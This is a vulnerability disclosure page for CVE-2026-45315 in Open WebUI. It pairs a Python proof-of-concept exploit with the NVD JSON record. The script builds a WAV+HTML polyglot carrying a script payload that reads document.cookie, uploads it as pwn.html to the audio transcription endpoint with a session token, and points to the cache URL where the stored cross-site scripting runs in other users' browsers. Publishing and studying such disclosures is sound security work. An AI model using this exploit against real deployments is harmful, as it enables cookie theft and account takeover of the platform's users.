CVE-2026-45315

import requests # Target URL url = "http://target-open-webui-url/api/v1/audio/transcriptions" # 1. Create a polyglot file (WAV header + HTML) # WAV header structure (minimal) wav_header = b"RIFF\x24\x00\x00\x00WAVEfmt " wav_header += b"\x10\x00\x00\x00\x01\x00\x01\x00\x44\xAC\x00\x00\x88\x58\x01\x00\x02\x00\x10\x00" wav_header += b"data\x00\x00\x00\x00" # Malicious HTML content html_payload = b"<html><body><script>alert(document.cookie);</script></body></html>" # Combine to create polyglot polyglot_data = wav_header + html_payload # 2. Upload the file files = { 'file': ('pwn.html', polyglot_data, 'audio/wav') } # Attacker's headers (valid session required) headers = { 'Authorization': 'Bearer <valid_token>' } response = requests.post(url, files=files, headers=headers) if response.status_code == 200: print("[+] Upload successful!") print(f"[+] Access the payload at: /cache/audio/transcriptions/pwn.html") else: print("[-] Upload failed")

{"cve": {"id": "CVE-2026-45315", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:54.250", "lastModified": "2026-05-15T22:16:54.250", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHE_DIR/audio/transcriptions/.. The /cache/{path} route serves these files via FileResponse, which sets Content-Type from the on-disk extension and emits no Content-Disposition. A verified user with the default-on chat.stt permission can upload a polyglot WAV+HTML file named pwn.html and trick any other user into opening the resulting URL — the response comes back as text/html and any embedded <script> runs in the Open WebUI origin. This vulnerability is fixed in 0.9.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-434"}, {"lang": "en", "value": "CWE-646"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-m8f9-9whg-f4xr", "source": "[email protected]"}]}}